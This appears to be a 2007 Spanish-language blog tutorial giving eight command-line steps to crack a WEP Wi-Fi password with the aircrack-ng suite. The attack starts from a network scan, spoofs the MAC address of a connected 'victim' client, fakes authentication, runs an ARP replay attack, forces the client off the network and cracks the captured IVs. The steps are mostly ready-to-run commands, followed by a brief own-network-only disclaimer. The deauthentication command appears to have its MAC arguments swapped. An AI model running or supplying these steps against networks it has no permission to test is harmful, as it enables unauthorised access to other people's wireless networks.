www.tuxapuntes.com

Buscar Contacto Colabora... Libro de Visitas
 
.
TuxInicio arrow TuxApuntes arrow Virtualizacion arrow --- OBTENER CLAVE WEB EN 8 PASOS, BY utopianegra - SUITE-NG ---
--- OBTENER CLAVE WEB EN 8 PASOS, BY utopianegra - SUITE-NG --- PDF Imprimir E-Mail
Escrito por utopianegra, on 31-07-2007 16:33
Visitas 4520

--- OBTENER CLAVE WEB EN 8 PASOS, BY utopianegra - SUITE-NG ---


1. SCANEAMOS UN OBJETIVO Y ANOTAMOS DATOS.


#sudo airodump-ng --ivs --write scaneo ath1

Guardara un log en el fichero scanneo. Qui nos fijamos en un AP, que tenga trafico y que tenga uncliente asociado, asi pues apuntaremos en un papelito los siguientes datos : ( es un ejemplo )

Datos de prueba, en tu caso serán otros:
ESSID   (nombre del wifi)   : WLAN_XX
BSSID   (Mac del router AP) : 00:11:22:33:44:55
STATION (MAC Cliente  )     : 66:77:88:99:99:99

apuntamos tambien : CHANNEL DEL ESSID.

* Para que esto tenga exito asegurado es necesario fijarse que el objetivo que queremos auditar, tenga una STATION, conectada y sobre todo que este generando algo de trafico en DATA.

2. ( creamos en modo monitor el interface ath1 )

# airmon-ng start wifi0

3. ( configuramos interface con MAC, victima)

# ifconfig ath1 down
# iwconfig ath1 channel          (canal de victima que anotamos)
# macchanger -m <mac> ath1       (mac STATION que anotamos)   
# ifconfig ath1 rate 1M          (solo en caso poca fuerza señal)

# ifconfig ath1 up

4. (nos autentificamos en el ap de la victima )

#aireplay-ng -1 0 -e WLAN_XX -a 00:11:22:33:44:55 -h 66:77:88:99:99:99 ath1

5. (Lanzamos el airodump, en el canal  apuntado )


#sudo airodump-ng --ivs --write wlan_xx --channel 7 ath1

- almacenara un fichero llamado wlan_xx, con los ivs que capturemos y que necesitaremos para poder ejecutar posteriormente el aircrack.

6. (Lanzamos el ataque )

#aireplay-ng -3 -b 00:11:22:33:44:55 -h 66:77:88:99:99:99 ath1


7. (Forzamos desautentificacion de la victima)

#aireplay-ng -0 0 -a 66:77:88:99:99:99 -c 00:11:22:33:44:55 ath1

- nos fijamos que la ventana lanzada en el punto 5, empieza a capturar pasados unos minutos, un monton de trafico en DATA asi como en la ventana del ataque número 6, se comienzan a capturar y enviar paquetes ARP.

- Si esto marcha como digo, solo nos queda salir a tomarnos un cafe y dejar el portatil trabajar , despues de un par de horas .. cuando tengamos un fichero lo sufientenmente lleno de IVS. Pasamos al paso 8.

8. ( cuando tengamos suficientes IVS , EJECUTAMOS AIRCRACK )

#aircrack-ng -y wlan_xx.ivs

 

Aqui decimos cual es el BSSID, que queremos descifrar y no creo que tarde ni 5 segundos en darte la passord.

Saluditos y por supuesto, espero useis esta información para detectar si vuestra propia red wifi es vulnerable a estos fallos de seguridad y despues de esta pequeña auditoria le pongais remedio. En ningún caso debera utilizarse esta información para auditar la seguridad de redes disntintas a las nuestras, salvo que su propietaio nos pida que le hagamos una auditoria de seguridad.

 

Comparteme:
Meneame
Delicious
Digg
Technorati
YahooMyWeb
MLinuxfera

Revisado el: 05-08-2007 17:30

Publicado el : Manuales (HowTo), Seguridad

Comentarios de usuarios (0)

Ningún comentario guardado

Añade tu comentario



mXcomment 1.0.5 © 2007-2008 - visualclinic.fr
License Creative Commons - Some rights reserved
 
< Anterior   Siguiente >
[Volver]


Si te resulta util esta informacion y quieres contribuir mediante alguna donación para el mantenimiento y mejora de ese site, te dejamos un enlace para que puedas ayudarnos por medio de paypal.

 Muchas gracias.








Enlaces

Cursos
Masters
MBA

Menu Principal

TuxInicio
TuxApuntes
TuxAyuda
TuxFAQs
TuxDescargas

Tux Gadgets

PacMan *
Sudoku Online
Slot Machine
Invaders
BlackJack
Video Poker
Top10 YouTube

Login






¿Recuperar clave?
¿Quiere registrarse? Regístrese aquí
Hay 33 invitados y 1 usuario en línea
  • clara cagigal

Translate

Top WebLinks

Enlaces - Blogroll
feed image

Tux Estadisticas

OS: Linux h
PHP: 5.2.6
MySQL: 5.0.67-community-log
Hora: 21:10
Caching: Disabled
GZIP: Enabled
Usuarios: 4027
Noticias: 1051
Enlaces: 50
Visitantes: 3683048

Galaxia Linux

TUXrank .. SITES



Creative Commons License


Esta obra está bajo una
licencia de Creative Commons.


¿Quieres anunciarte aquí?

Tux del Dia

th_1548.jpg

Tux Encuesta

¿Aconsejas Ubuntu a tús amigos?
 
¿Has actualizado a Intepid Ibex 8.10?
 

[+]
  • Narrow screen resolution
  • Wide screen resolution
  • Auto width resolution
  • Increase font size
  • Decrease font size
  • Default font size
  • default color
  • blue color
  • green color